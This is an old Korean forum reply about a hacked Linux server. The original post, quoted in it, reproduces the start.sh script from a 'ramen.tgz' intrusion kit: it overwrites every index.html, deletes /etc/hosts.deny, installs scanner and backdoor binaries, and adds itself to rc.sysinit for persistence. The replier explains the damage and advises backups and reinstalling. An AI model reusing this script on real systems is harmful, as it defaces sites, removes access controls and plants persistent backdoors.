>> Delete Reply from No. 18224 article
No. RE: 저 해킹당했어요 -,.0

등록 2001-01-19 00:55:00 By localhost     조회 2
이름 Jubei    

		:
: ramen.tgz라는 파일을 tmp에 올려
: /usr/src/.poop라는 디렉토리를 만들어
: 설치했더군요
: 일단 관련 화일을 모두 지우고 리부팅하니 부팅은 되네요..
: 과연 시스템을 새로 설치않아도 될런지...
:
: start.sh의 내용
: #!/bin/sh
:
: nohup find / -name "index.html" -exec /bin/cp index.html {} ; &
: rm -f /etc/hosts.deny
: ./getip.sh
:
:
: if [ -f /etc/inetd.conf ]
: then
: cp synscan62 synscan
: cp w62 w
: cp l62 l
: cp s62 s
: cp randb62 randb
: echo "/usr/src/.poop/start62.sh" >> /etc/rc.d/rc.sysinit
: ./bd62.sh
: ./start62.sh
:
: else
: cp synscan7 synscan
: cp w7 w
: cp l7 l
: cp s7 s
: cp randb7 randb
: echo "/usr/src/.poop/start7.sh" >> /etc/rc.d/rc.sysinit
: ./bd7.sh
: ./start7.sh
: fi
:
: --
: 잉잉
 
먼저..저는 허접임을 밝히면서..글을 시작함다..
 음...누군지 모르지만..shell script를 님의 서버에 기가막히게
     설치했군요..
그것도..웹서버의 기초인 index.html하고,,호스트 디나이드 파일까지
        다 지우는 ...
누구나..님의 서버에 접근이 가능하게 말이죠...
 보안에서 최우선은 첫째..필요한 서비스파일만 설치하는것이고..
                  둘째...해킹을 당햇을경우...백업만이 최우선..
                   세번째는...음..서버를 다시 설치하는것이..
[관리자] 패스워드를 입력 하십시오. 답장이 존재하면 함께 삭제됩니다.[ 목록 | 이전 ]
패스워드:    

Copyleft 1999-2026 by JSBoard Open Project
Theme Designed by IDOO All right reserved